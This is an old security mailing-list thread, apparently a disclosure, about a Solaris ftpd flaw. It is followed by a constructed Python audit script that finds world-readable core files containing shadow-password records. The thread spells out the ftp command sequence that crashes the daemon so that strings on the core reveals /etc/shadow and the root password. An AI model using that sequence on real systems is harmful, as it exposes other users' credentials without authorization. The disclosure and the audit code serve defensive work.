Martin's method works for Solaris 2.5.1 as well. 'strings' on the core file
reveals the complete contents of /etc/shadow. This is not good. To reiterate,
if someone else is running an ftp session on host_a, start your own ftp
session with host_a. Then issue the commands
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv
Examine the resulting core file with the strings command.
This method does not work with Solaris 2.4.
>
> James Poland 6-5251 wrote:
> >
> > On Solaris 2.5.1, the core file contains only the user's password in
> > cleartext. How hard is it to crash someone else's ftp session?
>
> Killing from the command line doesn't seem to work, but:
>
> SunOS 5.5:
>
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
> -Martin
>
> PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
> so they seem to have used the proposed fix
>
> Checking for "pw != NULL"
>
> So this proposal was simple and obvious ... and incomplete. :)
>
Received on Oct 16 1996
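The thread shows the damage (shadow entries sitting in a world-readable core under /tmp) but gives an administrator no way to find such files. The following is an added example, not code from the thread or from Sun: a small audit that walks a directory for files named `core` or `core.<pid>`, extracts printable strings the way strings(1) does, flags any that look like Solaris shadow(4) records (nine colon-separated fields), and reports whether the file is world-readable. The core contents, the `EXAMPLEHASH` value and the function names are all constructed for the example.

```python
import os
import re
import stat
import tempfile

# One shadow(4) record: user:hash:lastchg:min:max:warn:inactive:expire:flag
# Nine fields on Solaris; the regex also tolerates the eight-field layout.
SHADOW_RE = re.compile(rb'^[a-z_][a-z0-9_-]*:[^:\n]*:(?:[0-9]*:){5,6}[0-9]*$')

# Constructed stand-in for a core file: a little binary noise, the bogus
# password from the thread, three shadow-style records (placeholder hash),
# then more noise. No real credentials are involved.
CONSTRUCTED_CORE = (
    b'\x7fELF\x02\x01\x01\x00' + b'\x00' * 16 +
    b'wrongpasswd\x00' +
    b'root:EXAMPLEHASHxyz:9876::::::\n'
    b'daemon:NP:6445::::::\n'
    b'bin:NP:6445::::::\n' +
    b'\x00\x01\x02' + b'/tmp\x00'
)


def printable_strings(data: bytes, min_len: int = 4):
    """Runs of printable ASCII at least min_len long, like strings(1)."""
    return [m.group(0) for m in re.finditer(rb'[\x20-\x7e]{%d,}' % min_len, data)]


def shadow_entries(data: bytes):
    """Printable strings of data that have the shape of a shadow record."""
    return [s for s in printable_strings(data) if SHADOW_RE.match(s)]


def audit_core_file(path: str):
    """Report world-readability and leaked account names for one core file."""
    st = os.stat(path)
    with open(path, 'rb') as f:
        leaked = shadow_entries(f.read())
    return {
        'path': path,
        'world_readable': bool(st.st_mode & stat.S_IROTH),
        'leaked_users': [e.split(b':', 1)[0].decode() for e in leaked],
    }


def scan_directory(directory: str):
    """Audit every file named 'core' or 'core.<pid>' in directory (assumed naming)."""
    results = []
    for name in sorted(os.listdir(directory)):
        if name == 'core' or name.startswith('core.'):
            results.append(audit_core_file(os.path.join(directory, name)))
    return results


def demo():
    """Drop the constructed core into a temp dir, mode 0644 as in the thread, and scan it."""
    workdir = tempfile.mkdtemp()
    core_path = os.path.join(workdir, 'core')
    with open(core_path, 'wb') as f:
        f.write(CONSTRUCTED_CORE)
    os.chmod(core_path, 0o644)  # world-readable, like the /tmp core in the thread
    return scan_directory(workdir)


if __name__ == '__main__':
    for report in demo():
        print(report)
```

Run it against /tmp (or wherever a daemon's working directory is) rather than the temp dir `demo()` builds; a hit with `world_readable` true and a non-empty `leaked_users` list is exactly the condition the thread describes. The underlying fix is still to stop a privileged daemon from dumping core with secrets in its address space at all, which the shadow-field check cannot do by itself.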